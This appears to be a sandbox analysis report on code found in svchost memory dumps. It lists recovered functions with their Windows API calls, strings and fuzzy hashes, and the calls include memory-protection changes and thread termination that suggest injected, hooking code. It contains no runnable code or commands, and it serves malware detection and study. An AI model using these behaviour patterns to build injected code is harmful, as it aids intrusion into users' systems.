API ID: Thread$Current$Context
String ID:
API String ID: 1666949209-0
Opcode ID: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
Instruction ID: 6a3c55ebfb2240c1356e493e26d9900c2a24269e5561269746279c3b4b99cf85
Opcode Fuzzy Hash: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
Instruction Fuzzy Hash: 10D18C76209F8A85EA709F5BE49939AB7A0F3C8B84F100116EACD47BA5DF3CC551CB10

Function 000002917C3B30B4 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000002917C3B30D7
HeapAlloc.KERNEL32 ref: 000002917C3B30EA
StrCmpNIW.SHLWAPI ref: 000002917C3B316B
GetProcessHeap.KERNEL32 ref: 000002917C3B31D1
HeapFree.KERNEL32 ref: 000002917C3B31DF

Strings

dialer, xrefs: 000002917C3B3164

Memory Dump Source

Source File: 0000001D.00000002.2684972772.000002917C3B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C3B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2917c3b0000_svchost.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID: dialer
API String ID: 756756679-3528709123
Opcode ID: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
Instruction ID: 6f4ba32b92c98d9f43710b2f38acc0c61c4c9e05d96ca69bd71f73519c75bdaf
Opcode Fuzzy Hash: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
Instruction Fuzzy Hash: B0319261701B6396FBA5EF97E84A2E9E3A4FB44B84F0481249E4C07B54EF3CC4B58790

Function 000002917C9730B4 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000002917C9730D7
HeapAlloc.KERNEL32 ref: 000002917C9730EA
StrCmpNIW.SHLWAPI ref: 000002917C97316B
GetProcessHeap.KERNEL32 ref: 000002917C9731D1
HeapFree.KERNEL32 ref: 000002917C9731DF

Strings

dialer, xrefs: 000002917C973164

Memory Dump Source

Source File: 0000001D.00000002.2687432521.000002917C970000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C970000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2917c970000_svchost.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID: dialer
API String ID: 756756679-3528709123
Opcode ID: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
Instruction ID: ef72b06316c753c0684a3e6402df4776d55a1ff6bf55708ba6fcc62500bc0b05
Opcode Fuzzy Hash: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
Instruction Fuzzy Hash: BC318562702B5792FB95DF97E9486BAE3A0FB46B94F0481209E4847B54EF38C5B1C700

Function 000002917C3B1A14 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 000002917C3B1A3A
K32GetModuleFileNameExW.KERNEL32 ref: 000002917C3B1A58
PathFindFileNameW.SHLWAPI ref: 000002917C3B1A67
lstrlenW.KERNEL32 ref: 000002917C3B1A73
StrCpyW.SHLWAPI ref: 000002917C3B1A86
CloseHandle.KERNEL32 ref: 000002917C3B1A94

Memory Dump Source

Source File: 0000001D.00000002.2684972772.000002917C3B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C3B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2917c3b0000_svchost.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID:
API String ID: 517849248-0
Opcode ID: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
Instruction ID: 528a2bb23c40a460a140dc7eb62198b7d0f8312f95cb019315eff54dce06bf00
Opcode Fuzzy Hash: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
Instruction Fuzzy Hash: 2A010971300A4396FA64AB93E4597D9A3A1F788BC0F484435DE9943794DF3CC9958750

Function 000002917C971A14 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 000002917C971A3A
K32GetModuleFileNameExW.KERNEL32 ref: 000002917C971A58
PathFindFileNameW.SHLWAPI ref: 000002917C971A67
lstrlenW.KERNEL32 ref: 000002917C971A73
StrCpyW.SHLWAPI ref: 000002917C971A86
CloseHandle.KERNEL32 ref: 000002917C971A94

Memory Dump Source

Source File: 0000001D.00000002.2687432521.000002917C970000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C970000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2917c970000_svchost.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID:
API String ID: 517849248-0
Opcode ID: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
Instruction ID: 72c616c9ca87fa0e2fb3a8a481409ecff5dfd38378163874a26b9cde0d7ea4b0
Opcode Fuzzy Hash: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
Instruction Fuzzy Hash: 06015B21300A43D6FA94DB93E4583AAA3A1F789FC0F484035CE8D43B54DF38C9958300

Function 000002917C3B37AC Relevance: 9.0, APIs: 6, Instructions: 39threadCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 000002917C3B37C8
GetCurrentProcess.KERNEL32 ref: 000002917C3B37D6
VirtualProtectEx.KERNEL32 ref: 000002917C3B37F8
GetCurrentProcess.KERNEL32 ref: 000002917C3B3819
VirtualProtectEx.KERNEL32 ref: 000002917C3B383A
TerminateThread.KERNEL32 ref: 000002917C3B3849

Memory Dump Source

Source File: 0000001D.00000002.2684972772.000002917C3B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C3B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2917c3b0000_svchost.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
String ID:
API String ID: 449555515-0
Opcode ID: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
Instruction ID: e91eddb943dd45e48329029120936840e4bf1c0966dcc50cb251196b09367c1e
Opcode Fuzzy Hash: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
Instruction Fuzzy Hash: 43112D75711B5386FBB49BA3E80E7DAA7A0BB48B81F044525CD4947794EF3DC428C721

Function 000002917C3B90D8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000002917C3B9103
_IsNonwritableInCurrentImage.LIBCMT ref: 000002917C3B9198
RtlUnwindEx.NTDLL ref: 000002917C3B91E7

Strings

f, xrefs: 000002917C3B9116
csm, xrefs: 000002917C3B917E

Memory Dump Source

Source File: 0000001D.00000002.2684972772.000002917C3B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C3B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2917c3b0000_svchost.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm$f
API String ID: 2395640692-629598281
Opcode ID: 2b68ddb093160c159f3838c1131a2f908320feabf111407c5e8bfe37d954b0ed
Instruction ID: bcb007f12f0a80f6abfa06b0a50998d9f56ba69d5ee696c07124d5dc7ed47f4f
Opcode Fuzzy Hash: 2b68ddb093160c159f3838c1131a2f908320feabf111407c5e8bfe37d954b0ed
Instruction Fuzzy Hash: EE51BC32B11B078AFB54CF97E84DB99B7A5F344BA8F508120DA1A4B788DB35C861C760

Function 000002917C9790D8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000002917C979103
_IsNonwritableInCurrentImage.LIBCMT ref: 000002917C979198
RtlUnwindEx.NTDLL ref: 000002917C9791E7

Strings

f, xrefs: 000002917C979116
csm, xrefs: 000002917C97917E

Memory Dump Source

Source File: 0000001D.00000002.2687432521.000002917C970000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C970000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2917c970000_svchost.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm$f
API String ID: 2395640692-629598281
Opcode ID: 2b68ddb093160c159f3838c1131a2f908320feabf111407c5e8bfe37d954b0ed
Instruction ID: 59d09a8618965b64426e9fa1b4f2833b0c2e479f01b98339679c6812110e112a
Opcode Fuzzy Hash: 2b68ddb093160c159f3838c1131a2f908320feabf111407c5e8bfe37d954b0ed
Instruction Fuzzy Hash: D151B1323126438AFB94DFB6E44CBB9B7A5F346BA8F528120DE1647788DB35D961C700

Function 000002917C3B1AB8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON

Download Yara Rule

APIs

GetFinalPathNameByHandleW.KERNEL32 ref: 000002917C3B1AD8
StrCmpNIW.SHLWAPI ref: 000002917C3B1AF2
lstrlenW.KERNEL32 ref: 000002917C3B1B01
StrCpyW.SHLWAPI ref: 000002917C3B1B16

Strings

\\?\, xrefs: 000002917C3B1AE6

Memory Dump Source

Source File: 0000001D.00000002.2684972772.000002917C3B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C3B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2917c3b0000_svchost.jbxd

Similarity

API ID: FinalHandleNamePathlstrlen
String ID: \\?\
API String ID: 2719912262-4282027825
Opcode ID: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
Instruction ID: 17e51d28d513f920e32d509f1b692e7e2fcfc1ce129dd6027d301d8539b66207
Opcode Fuzzy Hash: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
Instruction Fuzzy Hash: 81F0447230464392FB709FA3F49A3DDE761F744B88F848020CA49466A4DF2CC658CB50

Function 000002917C3B3200 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

StrCmpIW.SHLWAPI ref: 000002917C3B3222
StrCpyW.SHLWAPI ref: 000002917C3B3232
StrCatW.SHLWAPI ref: 000002917C3B323E
PathCombineW.SHLWAPI ref: 000002917C3B324C

Strings

\\.\pipe\, xrefs: 000002917C3B3218

Memory Dump Source

Source File: 0000001D.00000002.2684972772.000002917C3B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C3B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2917c3b0000_svchost.jbxd

Similarity

API ID: CombinePath
String ID: \\.\pipe\
API String ID: 3422762182-91387939
Opcode ID: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
Instruction ID: 0bd278625c2eb5fe3e1e5d9e951961a74a9a5ca064144fcba52b3caf06c18908
Opcode Fuzzy Hash: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
Instruction Fuzzy Hash: DFF08234304B9391FAA08B93F94A1DDE220EB8CFD0F088131DE9A07BA8CF2CC4618310

Function 000002917C973200 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

StrCmpIW.SHLWAPI ref: 000002917C973222
StrCpyW.SHLWAPI ref: 000002917C973232
StrCatW.SHLWAPI ref: 000002917C97323E
PathCombineW.SHLWAPI ref: 000002917C97324C

Strings

\\.\pipe\, xrefs: 000002917C973218

Memory Dump Source

Source File: 0000001D.00000002.2687432521.000002917C970000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C970000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2917c970000_svchost.jbxd

Similarity

API ID: CombinePath
String ID: \\.\pipe\
API String ID: 3422762182-91387939
Opcode ID: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
Instruction ID: d6a5dade3bbd5061acbb23ef2f01d1b8c8b8e437621835871371c2175c78e0f4
Opcode Fuzzy Hash: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
Instruction Fuzzy Hash: BAF08220304BC3D1FA908B93F9581BAE2A1BB4AFD0F488131DE5A47B29CF2CC4618300

Function 000002917C3BA138 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 000002917C3BA154
GetProcAddress.KERNEL32 ref: 000002917C3BA16A
FreeLibrary.KERNEL32 ref: 000002917C3BA187

Strings

mscoree.dll, xrefs: 000002917C3BA14B
CorExitProcess, xrefs: 000002917C3BA163

Memory Dump Source

Source File: 0000001D.00000002.2684972772.000002917C3B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C3B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2917c3b0000_svchost.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
Instruction ID: c0f4d0548e0eb18f2c1711cebe02f3013e3323000a8f68909576bd92bec2315b
Opcode Fuzzy Hash: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
Instruction Fuzzy Hash: C3F0FE72311A4791FFA55FA3E88A3E9A360EB48B91F442019951B457A4DF2CC4A9C720

Function 000002917C97A138 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 000002917C97A154
GetProcAddress.KERNEL32 ref: 000002917C97A16A
FreeLibrary.KERNEL32 ref: 000002917C97A187

Strings

mscoree.dll, xrefs: 000002917C97A14B
CorExitProcess, xrefs: 000002917C97A163

Memory Dump Source

Source File: 0000001D.00000002.2687432521.000002917C970000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C970000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2917c970000_svchost.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
Instruction ID: b2252719d7807a4161f4be65e9cb1341e5322c5c32aab674f2488dc8c664b936
Opcode Fuzzy Hash: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
Instruction Fuzzy Hash: FBF0FE61362A47D1FFD44FA2E8983BAA7A0AB89B90F442019951B477A4DF28C5A8C700

Function 000002917C3B51B0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000002917C3B5236

Memory Dump Source

Source File: 0000001D.00000002.2684972772.000002917C3B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C3B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2917c3b0000_svchost.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
Instruction ID: 3c71fb551ff85124351bb61e6e9810b4d1d377b3f38adbf1823fe499c0a68a58
Opcode Fuzzy Hash: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
Instruction Fuzzy Hash: 1302BC36219B8686E760CF96E49539AF7A0F3C5794F104116EA8E87BA8DF7CC854CF10

Function 000002917C9751B0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000002917C975236

Memory Dump Source

Source File: 0000001D.00000002.2687432521.000002917C970000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C970000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2917c970000_svchost.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
Instruction ID: 44327ac94c9b3ef627a8d402e10e2c805b34a062bac7a7261ec5c7f2b4dc9c5e
Opcode Fuzzy Hash: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
Instruction Fuzzy Hash: D602BD36119B86C6E7E0CB96E4947AAF7A0F3C5794F104115EA8E87B69DF7CC454CB00

Function 000002917C3C0860 Relevance: 7.7, APIs: 5, Instructions: 202COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 000002917C3C08A2
GetConsoleMode.KERNEL32 ref: 000002917C3C0960
GetLastError.KERNEL32 ref: 000002917C3C09EA

Memory Dump Source

Source File: 0000001D.00000002.2684972772.000002917C3B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C3B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2917c3b0000_svchost.jbxd

Similarity

API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
String ID:
API String ID: 2210144848-0
Opcode ID: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
Instruction ID: 94d916d7f8feb0ef2b8ba1ce694d3cfa2411a0f37bfc6617e74d27390b1daef3
Opcode Fuzzy Hash: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
Instruction Fuzzy Hash: 52819D36710A9389FB609FE7D88A3EDA6A0F754B88F444216DE4A6B7D1DB34C461C730

Function 000002917C3B57F0 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000002917C3B5806

Memory Dump Source

Source File: 0000001D.00000002.2684972772.000002917C3B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C3B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2917c3b0000_svchost.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
Instruction ID: 937dd187684a93fc4a0a371c5cfb18e82c1c9fc7c5b71045479657b2503f7690
Opcode Fuzzy Hash: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
Instruction Fuzzy Hash: 8A61AA36719B82C6F7609F96E45935AB7A0F388B54F100116FA8D87BA4DB7CC961CF10

Function 000002917C3C1EB8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 000002917C3C1EE0
_set_statfp.LIBCMT ref: 000002917C3C1EFB
_set_statfp.LIBCMT ref: 000002917C3C1F17
_set_statfp.LIBCMT ref: 000002917C3C1F53

Memory Dump Source

Source File: 0000001D.00000002.2684972772.000002917C3B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C3B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2917c3b0000_svchost.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction ID: 1b6738982dcf0e617715fd65e884e0b150f2850f27dc5679eb4338a4a623ffbf
Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction Fuzzy Hash: 91117032B58A1341F6B811EBE45F7EDE0416B66374F484724EA76063DA8B988C627230

Function 000002917C3B9658 Relevance: 7.6, APIs: 5, Instructions: 53COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 000002917C3B9677
SetLastError.KERNEL32 ref: 000002917C3B96FE

Memory Dump Source

Source File: 0000001D.00000002.2684972772.000002917C3B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C3B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2917c3b0000_svchost.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 7802049b4883bf50180bab68563004ea007fb3dc3120036de214afe70cc89c3c
Instruction ID: aef2d3e1cf869e959b1c88e08fe3342268ed212d724d5eaba1cfb1930dbafce0
Opcode Fuzzy Hash: 7802049b4883bf50180bab68563004ea007fb3dc3120036de214afe70cc89c3c
Instruction Fuzzy Hash: 9811213071175786FE649FA7E84E7E9B2A167887A0F144624D926077E5DF2CC8728630

Function 000002917C979658 Relevance: 7.6, APIs: 5, Instructions: 53COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 000002917C979677
SetLastError.KERNEL32 ref: 000002917C9796FE

Memory Dump Source

Source File: 0000001D.00000002.2687432521.000002917C970000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C970000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2917c970000_svchost.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 7802049b4883bf50180bab68563004ea007fb3dc3120036de214afe70cc89c3c
Instruction ID: 74c0414a35b5a3f53ab2054dbc6437830451d03d99355e2cee5e6eeca0a9b90b
Opcode Fuzzy Hash: 7802049b4883bf50180bab68563004ea007fb3dc3120036de214afe70cc89c3c
Instruction Fuzzy Hash: 20113321713643C2FED49BB7A84C7F5A292E786BA0F154724D926077D5DF2CC862C700

Function 000002917C3B3878 Relevance: 7.5, APIs: 5, Instructions: 45COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 000002917C3B3886
GetCurrentProcess.KERNEL32 ref: 000002917C3B38B4
VirtualProtectEx.KERNEL32 ref: 000002917C3B38D6
GetCurrentProcess.KERNEL32 ref: 000002917C3B38F4
VirtualProtectEx.KERNEL32 ref: 000002917C3B3915

Memory Dump Source

Source File: 0000001D.00000002.2684972772.000002917C3B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C3B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2917c3b0000_svchost.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModule
String ID:
API String ID: 1092925422-0
Opcode ID: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
Instruction ID: 57ca71e22fa5b3ed83cc1bf47a705c019001b811a1058a7761075c86e86717fb
Opcode Fuzzy Hash: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
Instruction Fuzzy Hash: B311182A704B5286FBA49F93E4093E9A6A0FB48B84F040029DE8947B94EF3DC5188710

Function 000002917C973878 Relevance: 7.5, APIs: 5, Instructions: 45COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 000002917C973886
GetCurrentProcess.KERNEL32 ref: 000002917C9738B4
VirtualProtectEx.KERNEL32 ref: 000002917C9738D6
GetCurrentProcess.KERNEL32 ref: 000002917C9738F4
VirtualProtectEx.KERNEL32 ref: 000002917C973915

Memory Dump Source

Source File: 0000001D.00000002.2687432521.000002917C970000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C970000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2917c970000_svchost.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModule
String ID:
API String ID: 1092925422-0
Opcode ID: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
Instruction ID: 9739da4be943f2dc8e92f1252a47373430bb86a515c1afab9827f44ca7d1f82e
Opcode Fuzzy Hash: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
Instruction Fuzzy Hash: 65111E2A705B43C2FB949B92F4187BAA6B4F74AB84F044029DE8947794EF3DC555C704

Function 000002917C3B14B4 Relevance: 6.3, APIs: 5, Instructions: 42memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000002917C3B14D5
HeapFree.KERNEL32 ref: 000002917C3B14E4
GetProcessHeap.KERNEL32 ref: 000002917C3B14F0
HeapFree.KERNEL32 ref: 000002917C3B14FF
GetProcessHeap.KERNEL32 ref: 000002917C3B152A

Memory Dump Source

Source File: 0000001D.00000002.2684972772.000002917C3B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C3B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2917c3b0000_svchost.jbxd

Similarity

API ID: Heap$Process$Free
String ID:
API String ID: 3168794593-0
Opcode ID: f1983aadbafb302923b8fe7f482f9c632134a4f8d61b19ff0aa35b357364af3e
Instruction ID: 61586a0ae3d9af336a7feb3244d58183b5b2c7967cb7b94cd89bd2c1bdd5a7c6
Opcode Fuzzy Hash: f1983aadbafb302923b8fe7f482f9c632134a4f8d61b19ff0aa35b357364af3e
Instruction Fuzzy Hash: 3E112E72614B8A9AF764AFA7E84929EB371F789B84F044029DB8A03754DF3CC461C750

Function 000002917C3B26F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 000002917C3B27D4
StrCpyW.SHLWAPI ref: 000002917C3B27ED

Strings

\\.\pipe\, xrefs: 000002917C3B27DF

Memory Dump Source

Source File: 0000001D.00000002.2684972772.000002917C3B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C3B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2917c3b0000_svchost.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
Instruction ID: b8c861478b1f25366fd74288f1d51551b38ed3c61af69358ef0e1c5a1f5b0404
Opcode Fuzzy Hash: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
Instruction Fuzzy Hash: D7719C32310BC386FB649EA7D95A7EAF690F784BC4F444216DE4947B89DF36C6248B10

Function 000002917C3B24DC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 000002917C3B25C3
StrCpyW.SHLWAPI ref: 000002917C3B25DA

Strings

\\.\pipe\, xrefs: 000002917C3B25CE

Memory Dump Source

Source File: 0000001D.00000002.2684972772.000002917C3B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C3B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2917c3b0000_svchost.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
Instruction ID: 20237c5c54a3f8eb10ff098e720b8d591b180cfe9ccf8979255d570dc9b993f9
Opcode Fuzzy Hash: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
Instruction Fuzzy Hash: 2551F9323047C342F6749EABD55E7EEE651F385780F014225DD8A43B9ACF7AC4218B60

Function 000002917C9724DC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 000002917C9725C3
StrCpyW.SHLWAPI ref: 000002917C9725DA

Strings

\\.\pipe\, xrefs: 000002917C9725CE

Memory Dump Source

Source File: 0000001D.00000002.2687432521.000002917C970000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C970000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2917c970000_svchost.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
Instruction ID: 60c1c28be9136a5e28ed507775e51aa3993954b3d1a94bd617eaebac4fcea883
Opcode Fuzzy Hash: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
Instruction Fuzzy Hash: 3D51C732226B83C2F6B49EAB955C3FEE791F386780F404027DD8903B9ADB35D4618B40

Function 000002917C3C0604 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 000002917C3C071B
GetLastError.KERNEL32 ref: 000002917C3C073D

Strings

U, xrefs: 000002917C3C06C7

Memory Dump Source

Source File: 0000001D.00000002.2684972772.000002917C3B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C3B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2917c3b0000_svchost.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
Instruction ID: bdb08726b3ef75628cdaab26a9841a66a8a6064bf0ac9d8b050c925bfa4f7aa7
Opcode Fuzzy Hash: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
Instruction Fuzzy Hash: 6341B572314A8281FB609F67E4493DEB7A0F388784F404125EE8E87798DB3CC561CB50

